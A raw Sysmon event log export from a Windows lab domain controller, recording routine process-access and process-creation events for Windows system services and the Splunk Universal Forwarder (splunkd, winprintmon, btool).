13:36:29.387{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:29.387{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:29.387{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:29.387{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:29.387{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:29.387{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:29.387{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EDD-6005-9C00-00000000A301}4704C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:29.387{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EDD-6005-9C00-00000000A301}4704C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:29.388{59A5CD1D-8EDD-6005-9C00-00000000A301}4704C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.841{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EDF-6005-A000-00000000A301}4360C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.841{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.841{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.841{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.841{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.841{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.841{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.841{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.841{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.841{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.841{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EDF-6005-A000-00000000A301}4360C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.841{59A5CD1D-8EDF-6005-9F00-00000000A301}45924572C:\Windows\system32\cmd.exe{59A5CD1D-8EDF-6005-A000-00000000A301}4360C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.843{59A5CD1D-8EDF-6005-A000-00000000A301}4360C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EDF-6005-9F00-00000000A301}4592C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 10341000x80000000000000003353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.825{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EDF-6005-9F00-00000000A301}4592C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.825{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.825{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.825{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:31.825{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 